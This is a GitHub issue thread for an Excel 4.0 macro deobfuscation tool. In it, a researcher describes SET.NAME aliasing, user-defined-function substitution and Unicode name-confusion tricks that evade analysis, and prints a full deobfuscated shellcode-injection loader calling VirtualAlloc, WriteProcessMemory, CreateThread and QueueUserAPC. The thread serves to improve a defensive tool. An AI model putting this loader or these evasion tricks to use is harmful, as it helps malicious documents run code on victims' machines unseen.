XLMMacroDeobfuscator icon indicating copy to clipboard operation
XLMMacroDeobfuscator copied to clipboard

Named function invocations can break deobfuscation

Open michaelweber opened this issue 4 years ago • 9 comments

Macro sheets allow Excel to replicate the effect of a RUN() invocation by defining a name and then referencing it in a sheet by appending () to the name.

For example:

=SET.NAME("InvokeMe",B1)
=InvokeMe()

is identical to calling RUN(B1). You can chain these expressions together as well, for example:

=SET.NAME("IndirectFunction","=B1")
=SET.NAME("IndirectInvocation",EVALUATE("IndirectFunction"))
=IndirectInvocation()

will also replicate calling RUN(B1). It looks like the invocation of a name and treating it as a RUN() expression hasn't been added to the grammar for the tool yet. Here's a small PoC for both of these cases that will help if maldoc authors start abusing this.

setname-obfuscation.xls.zip

michaelweber avatar May 26 '20 22:05 michaelweber

Interesting. I will add these functions. No need to update the grammar I suppose

SET.NAME is used to define a name...

SET.NAME is partially implemented

DissectMalware avatar May 27 '20 01:05 DissectMalware

Generated a new sample based on an upcoming Macrome release - it's a wrapped up version of EXCELntDonut with some obfuscation thrown in. There's a small amount of using the SET.NAME aliasing from defining a statement like varName=123, which may or may not work. The "final" macro after unpacking through all the CHAR() statements looks like:

=GOTO($A$2)
=GOTO($A$3)
=GOTO($A$4)
=GOTO($A$5)
=GOTO($A$6)
=REGISTER("Kernel32","VirtualAlloc","JJJJJ","Valloc",,1,9)
=REGISTER("Kernel32","WriteProcessMemory","JJJCJJ","WProcessMemory",,1,9)
=REGISTER("Kernel32","CreateThread","JJJJJJJ","CThread",,1,9)
=IF(ISNUMBER(SEARCH("32",GET.WORKSPACE(1))),GOTO($A$10),GOTO($A$21))
=Valloc(0,65536,4096,64)
šœƒ=$B$1
=SET.VALUE($D$1,0)
=WHILE(šœƒ<>"excel")
=SET.VALUE($D$2,LEN(šœƒ))
=WProcessMemory(-1,$A$10+($D$1*255),šœƒ,LEN(šœƒ),0)
=SET.VALUE($D$1,$D$1+1)
šœƒ=ABSREF("R[1]C",šœƒ)
=NEXT()
=CThread(0,0,$A$10,0,0,0)
=HALT()
1342439424
0
=WHILE($A$22=0)
=SET.VALUE($A$22,Valloc($A$21,65536,12288,64))
=SET.VALUE($A$21,$A$21+262144)
=NEXT()
=REGISTER("Kernel32","RtlCopyMemory","JJCJ","RTL",,1,9)
=REGISTER("Kernel32","QueueUserAPC","JJJJ","Queue",,1,9)
=REGISTER("ntdll","NtTestAlert","J","Go",,1,9)
šœƒ=$C$1
=SET.VALUE($D$1,0)
=WHILE(šœƒ<>"EXCEL")
=SET.VALUE($D$2,LEN(šœƒ))
=RTL($A$22+($D$1*10),šœƒ,LEN(šœƒ))
=SET.VALUE($D$1,$D$1+1)
šœƒ=ABSREF("R[1]C",šœƒ)
=NEXT()
=Queue($A$22,-2,0)
=Go()
=SET.VALUE($A$22,0)
=HALT()

As an added "treat", the cells that are built contain raw binary strings rather than wrapping them as CHAR(). It looks like XLMMacroDeobfuscator handles this fine (though it does play a bunch of console alerts as it prints things out which tends to slow down the printing rate) but this may slightly frustrate some of the binary dumping.

excelntdonut-macrome.xls.zip

michaelweber avatar May 31 '20 01:05 michaelweber

Generated an alternate document which can also cause some issues by abusing user defined functions combined with variables set using SET.NAME.

By hiding a subroutine in the sheet somewhere else (it can be simple like, =RETURN(CHAR(var))), we can fake pass an argument to the subroutine and invoke it by making a call like:

=IF(SET.NAME("var",73),InvokeChar(),)

Which is identical to =CHAR(73).

Right now this sort of approach will not be emulated, so once the GOTO() is reached, there's no content shown.

charsub-method.xls.zip

michaelweber avatar Jun 02 '20 00:06 michaelweber

Here's a slightly more refined version of the character substitution approach. This time the variables used take advantage of some unicode silliness in Excel. From the Excel UI, a cell looks like:

Some example cells

I can't actually copy paste the content out of Excel directly since there are null bytes in the formula, and it will truncate at those bytes.

charsub-unicode-name-magic.zip

michaelweber avatar Jun 07 '20 14:06 michaelweber

Generated an alternate document which can also cause some issues by abusing user defined functions combined with variables set using SET.NAME.

By hiding a subroutine in the sheet somewhere else (it can be simple like, =RETURN(CHAR(var))), we can fake pass an argument to the subroutine and invoke it by making a call like:

=IF(SET.NAME("var",73),InvokeChar(),)

Which is identical to =CHAR(73).

Right now this sort of approach will not be emulated, so once the GOTO() is reached, there's no content shown.

charsub-method.xls.zip

This is addressed in v0.1.5 (currently on Master branch)

DissectMalware avatar Jun 07 '20 18:06 DissectMalware

Uploading a sample which takes advantage of some more Unicode ridiculous-ness involving Excel's magic treatment of ḁ (U+1E01) 1E 01 and A (U+0041) - ◌̥ (U+0325) 00 41 03 25 as the same character for name usages.

unicode_decomposition.xls.zip

michaelweber avatar Jun 12 '20 23:06 michaelweber

That make sense to be honest. The same for À (can be represented with two characters in ASCII or one unicode)

DissectMalware avatar Jun 13 '20 12:06 DissectMalware

Here's a refinement of that abuse in a different way that could be used by attackers to obscure which argument is being passed to a function when performing analysis. In the sample below each cell uses an AND statement to execute two SET.NAME calls before invoking the user defined function. One SET.NAME sets the value to be used, the other sets a decoy value using a slightly different string that is only different at the byte level (it's imperceptible to the eye). It's randomized if the first or second SET.NAME value sets the correct argument each cell.

image

unicode_specification_abuse.xls.zip

michaelweber avatar Jun 18 '20 15:06 michaelweber

Yeah, the capitalization is pretty reasonable - the issue is when there's sort of uneven handling of stuff like unicode Whitespace characters or unicode characters that are just ignored. Ex:

unicode_name_confusion_adjusted_for_endianness

The fact that the Lbl record string and "real" arg string are considered to be a match, but the "decoy" arg string is not makes me wonder just how much of this behavior is following the Unicode specification vs a series of arbitrary edge case handling.

michaelweber avatar Jun 20 '20 16:06 michaelweber